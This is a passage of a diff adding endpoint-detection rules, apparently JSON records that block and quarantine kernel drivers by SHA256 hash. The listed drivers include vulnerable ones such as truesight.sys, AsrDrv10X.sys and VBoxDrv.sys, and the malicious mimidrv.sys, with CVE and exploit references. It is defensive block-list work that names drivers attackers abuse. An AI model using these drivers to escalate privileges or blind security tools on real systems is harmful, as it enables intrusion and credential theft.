+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "daf855a8-b5a1-5b75-9175-b820d81083eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465284Z",
+ "creation_date": "2026-03-23T11:45:30.465287Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf9451c9ccc5509b9912965f79c2b95eb89d805b2a186d7521d3a262cf5a7a37",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db04da39-2716-51d6-a9f8-9b43c20406fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823309Z",
+ "creation_date": "2026-03-23T11:45:31.823312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823320Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1363c4a199d2d078869aaaa0adeb581331ee6ad53112cb375a71bbf714f94ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db063f08-4220-52dc-9b0d-0d3c5a403e15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160703Z",
+ "creation_date": "2026-03-23T11:45:31.160705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8894089454a522b94ff6a733e457c27491e3d40c9db7769328de5626cdcf7dcb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db09681a-7ad8-5b49-bc4a-542a626e8fcb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616364Z",
+ "creation_date": "2026-03-23T11:45:29.616366Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c64688444d3e004da77dcfb769d064bb38afceeef7ff915dfc71e60e19ff18a",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db25a70b-abee-530c-9e92-ce3153d53c10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613407Z",
+ "creation_date": "2026-03-23T11:45:29.613409Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613414Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db29906a-b69a-5007-b76d-73343a5314c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144856Z",
+ "creation_date": "2026-03-23T11:45:32.144858Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144864Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0058db5dab98d570d418af5c2ea15333bec7723b5819ab4f433d7e7760fae8ed",
+ "comment": "Malicious Kernel Driver (aka driver_146b8f4f.sys) [https://www.loldrivers.io/drivers/cea8bd08-a3c5-4ae1-a568-387b909ada67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db29ff68-dc29-56f4-a828-cb095a99f204",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818322Z",
+ "creation_date": "2026-03-23T11:45:31.818326Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df378b30c98cd531929f6db91bb19fd96e5588f9a01b7a969d3d02529d4444db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db3fbb4d-d679-5188-bd0c-34ced063dae6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833425Z",
+ "creation_date": "2026-03-23T11:45:30.833428Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833437Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bbc9d28ae529e9c24db1f081933a2dd41f90e9f66d991732dada38bef414963",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db425a75-ac04-5374-8b48-988ece0d6c27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477725Z",
+ "creation_date": "2026-03-23T11:45:30.477729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "197896f4764d0c9e146cf532bbc531f93e6d61dbf28d25e3e96e2ba48d2b6c6a",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db59834a-5854-5e2f-ba8d-66bc2af475b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815650Z",
+ "creation_date": "2026-03-23T11:45:30.815652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba386547523c5779e47c59ccb1b853918386cd398f054ac767a3a5b333e3fad3",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db637111-070a-5c7e-9148-5ad22b902c0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488534Z",
+ "creation_date": "2026-03-23T11:45:31.488536Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "037a683b360372f57179f20da624e58c006607bd83e2292b8541a9b8483fa546",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db646702-3a12-5b70-b951-ab785f2d65a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821370Z",
+ "creation_date": "2026-03-23T11:45:31.821373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c31503f95a59bffd5804dae77a83a5cf469829ec3ff7434bc24a8ad7bd86df35",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db6b8d45-5507-5510-942e-83672fd02eeb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458193Z",
+ "creation_date": "2026-03-23T11:45:30.458196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458205Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4cf438838dc10b188b3d4a318fd9ba2479abb078458d7f97591c723e2d637ce",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db738645-0f73-5f35-9d8a-da181b514da7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491867Z",
+ "creation_date": "2026-03-23T11:45:31.491886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "058d6312910220df60ca41846c1960214e72527bff6ac38fd3c0004ff142e99d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db74607c-7bab-52be-a25d-ac1feb72e807",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606404Z",
+ "creation_date": "2026-03-23T11:45:29.606405Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606411Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6e758caceb7e3f548d5038541fcbadce73aec8212b7b8116c8c4ce1168486ec",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db74976a-ab9e-53c7-b80c-780bfc2ad02d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140618Z",
+ "creation_date": "2026-03-23T11:45:31.140620Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140626Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a19776f8a166c203029f85a111c0fc270f6f1265626cc55ca85bef69061143e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db7b3483-547d-5417-86d9-30d67d0842f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817178Z",
+ "creation_date": "2026-03-23T11:45:30.817181Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ace6dded819e87f3686af2006cb415ed75554881a28c54de606975c41975112",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db821369-2e81-5909-a5bc-ce14b30d45d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825422Z",
+ "creation_date": "2026-03-23T11:45:30.825426Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825435Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81aac371b0fb635ed36b7c83c5ce52ef3587f92bfc2b98d6641fa2efae2fe782",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db931d4b-3d06-51ec-87d3-2c08eed5b947",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618040Z",
+ "creation_date": "2026-03-23T11:45:29.618042Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4710acca9c4a61e2fc6daafb09d72e11b603ef8cd732e12a84274ea9ad6d43be",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db95c4c6-9a4e-5fe3-b08b-580bbf1f0f51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608369Z",
+ "creation_date": "2026-03-23T11:45:29.608371Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608376Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b24bd295ebe05f54c8efc353be1ac6cf2c07cf4036ef0756e8296129a8e7a63a",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "db9d1dba-5bf3-582c-8681-38c79f2131b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836541Z",
+ "creation_date": "2026-03-23T11:45:30.836543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836549Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0da33f5906af0bdfe630561ee62ae7a6d882f5a9811ba2638fa84adeadfb7160",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dba433f4-ce45-56f8-92c1-cdc06ee05ecd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493791Z",
+ "creation_date": "2026-03-23T11:45:31.493795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493804Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fbebacae253be6dea626ad354061b14a2da0d3c4ef6c9f31b29c7a0128f863ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dba785c4-eb61-5d4c-b720-70adb6cac2bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
